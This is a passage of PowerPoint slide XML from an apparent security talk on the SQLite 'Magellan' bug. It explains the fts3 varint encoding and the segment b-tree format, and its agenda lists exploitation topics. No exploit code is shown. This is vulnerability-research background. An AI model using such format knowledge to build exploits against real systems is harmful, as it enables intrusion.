        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4954557"/>
            <a:ext cx="10515600" cy="1735492"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> to the most significant bit to form a full byte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9638521" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Least Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517843" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>← </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Most Significant</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24079705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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620484" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000111</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234541" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848598" y="3367031"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4954557"/>
            <a:ext cx="10515600" cy="1735492"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> to the most significant bit to form a full byte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9638521" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Least Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517843" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>← </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Most Significant</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25217733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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620484" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000111</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234541" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848598" y="3367031"/>
            <a:ext cx="3614057" cy="1138335"/>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6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4954557"/>
            <a:ext cx="10515600" cy="1735492"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>On the most significant 7 bit group, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add a 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9638521" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Least Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517843" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>← </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Most Significant</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377130992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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Abbreviated as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Compact representation of integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>All integers in the fts3 shadow tables are stored in this format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Need to keep in mind during exploit development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331122855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Segment B-Tree Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B-Tree that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>customized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to serve for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extension’s needs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025205" y="3020786"/>
            <a:ext cx="9975592" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Segment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b-trees are prefix-compressed b+-trees. There is one segment b-tree for each row in the %_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>segdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table (see above). The root node of the segment b-tree is stored as a blob in the "root" field of the corresponding row of the %_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>segdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table. All other nodes (if any exist) are stored in the "blob" column of the %_segments table. Nodes within the %_segments table are identified by the integer value in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blockid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> field of the corresponding row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31759292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Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4610687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The Magellan Bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Introduction to SQLite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Analyzing the Bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Improving the Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
